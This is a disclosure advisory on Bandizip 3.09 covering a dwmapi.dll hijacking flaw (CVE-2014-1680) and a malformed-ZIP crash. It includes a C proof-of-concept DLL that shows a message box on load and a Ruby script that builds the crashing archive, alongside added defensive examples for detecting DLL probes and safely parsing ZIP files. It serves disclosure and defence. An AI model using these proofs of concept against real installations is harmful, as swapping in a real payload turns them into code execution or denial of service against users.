Bandizip Multiple Vulnerabilities

All of these issues were patched in Bandizip 3.10 after responsible disclosure to the vendor.

Overview of Bandizip

Bandizip is a lightweight, fast and free all-in-one archiver. It has a very fast algorithm for compression and extraction, with drag and drop support, high-speed archiving and multi-core compression, and it handles the most popular compression formats, including Zip, 7z, Rar and others.

Arbitrary DLL Injection Code Execution

Bandizip 3.09 and earlier are affected by a DLL hijacking issue in which the application loads dwmapi.dll in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into, for example, opening a file located on a remote WebDAV or SMB share. As can clearly be seen, dwmapi.dll is searched for by the application in the current directory as a result of it being loaded in an insecure manner.
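A defender-side way to spot this behaviour is to filter a Process Monitor capture for DLL probes that miss outside the Windows system directories, which is exactly the search the paragraph above describes. The following script is an added example, not code from the advisory or from Bandisoft: the CSV rows are constructed for the example, the column names are assumed to match Process Monitor's CSV export, and the process name, share and directory values are placeholders.

```ruby
# Added example (not the advisory's own code): triage a Process Monitor CSV export
# for DLL search-order hijacking candidates, i.e. a process probing for a DLL name
# outside the Windows system directories and getting NAME NOT FOUND. A miss in any
# such location means the loader looked there first, so an attacker who can write
# to it (a WebDAV/SMB share, an unprotected install directory) gets the load.
require 'csv'

# Constructed rows; column names follow Procmon's CSV export (assumption).
PROCMON_CSV = <<~CSV
  "Time of Day","Process Name","Operation","Path","Result"
  "18:26:12.5110000","Bandizip.exe","CreateFile","\\\\fileserver\\share\\dwmapi.dll","NAME NOT FOUND"
  "18:26:12.5120000","Bandizip.exe","CreateFile","C:\\Program Files\\Bandizip\\dwmapi.dll","NAME NOT FOUND"
  "18:26:12.5130000","Bandizip.exe","CreateFile","C:\\Windows\\System32\\dwmapi.dll","SUCCESS"
  "18:26:12.5140000","Bandizip.exe","CreateFile","C:\\Program Files\\Bandizip\\Bandizip.exe","SUCCESS"
  "18:26:12.5150000","Bandizip.exe","CreateFile","\\\\fileserver\\share\\archive.zip","SUCCESS"
  "18:26:12.5160000","explorer.exe","CreateFile","C:\\Users\\user\\AppData\\Local\\Temp\\foo.dll","NAME NOT FOUND"
CSV

# C:\Windows and everything beneath it (System32, SysWOW64, ...).
SYSTEM_DIR = %r{\A[a-z]:\\windows(\\|\z)}i

def system_path?(path)
  path.match?(SYSTEM_DIR)
end

# Returns one hash per suspicious probe: which DLL, where the loader looked for it,
# and whether that location is a remote (UNC) path such as the share mentioned above.
def hijack_candidates(csv_text, process_name)
  CSV.parse(csv_text, headers: true).each_with_object([]) do |row, out|
    next unless row['Process Name'].casecmp?(process_name)
    next unless row['Result'] == 'NAME NOT FOUND'
    path = row['Path']
    next unless path.downcase.end_with?('.dll')
    next if system_path?(path)

    parts = path.split('\\')
    out << { dll: parts.last.downcase,
             directory: parts[0...-1].join('\\'),
             remote: path.start_with?('\\\\') }
  end
end

if $PROGRAM_NAME == __FILE__
  hijack_candidates(PROCMON_CSV, 'Bandizip.exe').each do |c|
    puts "#{c[:dll]} probed in #{c[:directory]}#{c[:remote] ? ' (remote share)' : ''}"
  end
end
```

On the constructed capture the filter reports dwmapi.dll being looked for on the share and in the install directory, while the successful System32 load and the non-DLL files are ignored. Run against a real export, any hit in a directory that non-administrators can write to is the condition to fix, and the remote flag singles out the WebDAV/SMB case from the advisory.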

Proof of Concept

/*
* Exploit Title: Bandizip 3.09 DLL Hijacking Exploit (dwmapi.dll)
* Date: February 5th 2014
* Author: Osanda Malith Jayathissa
* E-Mail: osandajayathissa<at>gmail.com
* Version: 3.09
* Vendor Homepage: http://www.bandisoft.com/
* Tested on: Windows XP SP2 en
* Vulnerable extensions: All Extensions
* CVE: CVE-2014-1680
*/

#include <windows.h>

/* Payload of the PoC: a message box proving the library was loaded.
   MessageBoxA is used so the narrow string literals compile in both
   ANSI and Unicode builds. */
static void owned(void)
{
    MessageBoxA(0, "Bandizip DLL Hijacked\nOsanda Malith", "POC", MB_OK);
}

/* Compiled as a DLL named dwmapi.dll, as described in the advisory above. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;

    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs as soon as the hijacked DLL is mapped into the process. */
        owned();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Vulnerability Information

Class: DLL Hijacking [CWE-427]
Impact: System access
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2014-1680

Advisories

[1] http://www.bandisoft.com/bandizip/history/
[2] http://secunia.com/advisories/56846/
[3] http://www.osvdb.org/show/osvdb/102979
[4] http://packetstormsecurity.com/files/cve/CVE-2014-1680

Report Timeline

2014-01-19: Contacted the Vendor
2014-01-23: Issue fixed and acknowledged.
2014-01-24: Bandizip 3.10 Released
2014-01-25: Contacted MITRE and obtained a CVE-ID

.Zip Crash

I also found out that Bandizip 3.09 and earlier are affected by a file format crash, in which attackers can crash the application remotely.

Proof of Concept

#!/usr/bin/env ruby
# Exploit Title: Bandizip 3.09 .zip Crash POC
# Date: February 6th 2014
# Author: Osanda Malith Jayathissa
# E-Mail: osandajayathissa<at>gmail.com
# Version: 3.09
# Vendor Homepage: http://www.bandisoft.com/
# Tested on: Windows XP SP2 en

=begin
eax=00000000 ebx=0374fad0 ecx=00000000 edx=00000000 esi=0374fa54 edi=00000000
eip=770be1a4 esp=0374f92c ebp=0374faac iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
770be1a4 c21400          ret     14h
=end

# Local file header (30 bytes). Note: this header is one byte short between the
# date and CRC-32 fields, so the 0x0fe4 below lands one byte early and the header
# decodes with a name length of 15 and an uncompressed size of 0xE4000000.
# It is kept exactly as in the original PoC.
lf_header =  "\x50\x4B\x03\x04\x14\x00\x00"
lf_header += "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
lf_header += "\x00\x00\x00\x00\x00\x00\x00\x00"
lf_header += "\xe4\x0f" # 0x0fe4 = 4068 = length of the payload name below
lf_header += "\x00\x00\x00"

# Central directory file header (46 bytes)
cdf_header =  "\x50\x4B\x01\x02\x14\x00\x14"
cdf_header += "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
cdf_header += "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
cdf_header += "\xe4\x0f" # file name length: 0x0fe4 = 4068
cdf_header += "\x00\x00\x00\x00\x00\x00\x01\x00"
cdf_header += "\x24\x00\x00\x00\x00\x00\x00\x00"

# End of central directory record (22 bytes)
eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eofcdf_header += "\x12\x10\x00\x00" # Size of central directory (bytes): 46 + 4068
eofcdf_header += "\x02\x10\x00\x00" # Offset of start of central directory, relative to start of archive: 30 + 4068
eofcdf_header += "\x00\x00"

# Our Payload: a 4068-byte file name
payload = "A" * 4064
payload += ".txt"

exploit = lf_header + payload + cdf_header + payload + eofcdf_header

# Write in binary mode so the bytes are not altered by newline translation on Windows
File.open('bandizip.zip', 'wb') { |f| f.write(exploit) }
#EOF
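The PoC above assembles the three structures every ZIP reader has to trust (local file header, central directory entry, end-of-central-directory record), and its bytes actually encode a local header whose name length disagrees with the central directory. The reader below is an added example, not the advisory's code and not Bandizip's parser: it bounds-checks every read and rejects an archive as soon as the two headers disagree or a name exceeds a policy limit, before any buffer is sized from an attacker-controlled field. The field values in the builder mirror the PoC (version 20, the same time/date and attribute bytes); MAX_NAME is an assumed policy limit, and build_archive, zip_entry_names and ZipError are names chosen for this example.

```ruby
# Added example (not part of the original advisory): a bounds-checked reader for
# the ZIP structures built by the PoC above. It cross-checks the central directory
# against the local file header it points at and refuses inconsistent archives.

LOCAL_SIG   = 0x04034b50
CENTRAL_SIG = 0x02014b50
EOCD_SIG    = 0x06054b50
MAX_NAME    = 260   # assumed policy limit (Windows MAX_PATH); the format itself allows up to 65535

class ZipError < StandardError; end

# Slice len bytes at off, refusing to read past the end of the buffer.
def field(buf, off, len)
  if off < 0 || off + len > buf.bytesize
    raise ZipError, "read of #{len} bytes at offset #{off} runs past end of file"
  end
  buf.byteslice(off, len)
end

def u16(buf, off)
  field(buf, off, 2).unpack1('v')
end

def u32(buf, off)
  field(buf, off, 4).unpack1('V')
end

# Returns the entry names, or raises ZipError describing the first inconsistency found.
def zip_entry_names(buf)
  # The EOCD record is 22 bytes plus an optional comment of up to 65535 bytes; scan backwards for it.
  eocd = nil
  (buf.bytesize - 22).downto([buf.bytesize - 22 - 65_535, 0].max) do |i|
    if u32(buf, i) == EOCD_SIG
      eocd = i
      break
    end
  end
  raise ZipError, 'no end-of-central-directory record' if eocd.nil?

  entries   = u16(buf, eocd + 10)   # total entries in the central directory
  cd_size   = u32(buf, eocd + 12)
  cd_offset = u32(buf, eocd + 16)
  cd_end    = cd_offset + cd_size
  raise ZipError, 'central directory lies outside the file' if cd_end > eocd

  names = []
  off = cd_offset
  entries.times do
    raise ZipError, "bad central directory signature at #{off}" unless u32(buf, off) == CENTRAL_SIG
    name_len    = u16(buf, off + 28)
    extra_len   = u16(buf, off + 30)
    comment_len = u16(buf, off + 32)
    local_off   = u32(buf, off + 42)
    entry_end   = off + 46 + name_len + extra_len + comment_len
    raise ZipError, 'central directory entry overruns the central directory' if entry_end > cd_end

    # Both headers carry a name length. A parser that sizes a buffer from one and
    # copies using the other is exactly what a malformed archive exploits.
    raise ZipError, "bad local header signature at #{local_off}" unless u32(buf, local_off) == LOCAL_SIG
    local_name_len = u16(buf, local_off + 26)
    if local_name_len != name_len
      raise ZipError, "name length mismatch: central directory says #{name_len}, local header says #{local_name_len}"
    end
    raise ZipError, "entry name of #{name_len} bytes exceeds policy limit of #{MAX_NAME}" if name_len > MAX_NAME

    names << field(buf, off + 46, name_len)
    off = entry_end
  end
  names
end

# Assemble a one-entry stored archive with the same field values as the PoC above;
# local_name_len lets the local header disagree with the central directory.
def build_archive(name, local_name_len: name.bytesize)
  local   = [LOCAL_SIG, 20, 0, 0, 0xACB7, 0x34CE, 0, 0, 0, local_name_len, 0].pack('VvvvvvVVVvv') + name
  central = [CENTRAL_SIG, 20, 20, 0, 0, 0xACB7, 0x34CE, 0, 0, 0,
             name.bytesize, 0, 0, 0, 1, 0x24, 0].pack('VvvvvvvVVVvvvvvVV') + name
  eocd    = [EOCD_SIG, 0, 0, 1, 1, central.bytesize, local.bytesize, 0].pack('VvvvvVVv')
  local + central + eocd
end

if $PROGRAM_NAME == __FILE__
  # Same shape as the PoC archive: 4068-byte name in the central directory, 15 in the local header.
  poc = build_archive('A' * 4064 + '.txt', local_name_len: 15)
  begin
    p zip_entry_names(poc)
  rescue ZipError => e
    puts "rejected: #{e.message}"
  end
end
```

A well-formed archive parses to its entry names; the PoC-shaped archive is refused on the name-length mismatch, and the same archive with a consistent 4068-byte name is refused by the policy limit instead. The order matters: structural checks run before any name is copied, so neither failure mode reaches the point where a fixed-size buffer could be overrun.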

Report Timeline

2014-01-19: Contacted the Vendor
2014-01-23: Issue fixed and acknowledged.
2014-01-24: Bandizip 3.10 Released

Acknowledgements

As a result of reporting these vulnerabilities, my name was published in the About dialog box of Bandizip 3.10. Thanks to park for adding me 🙂
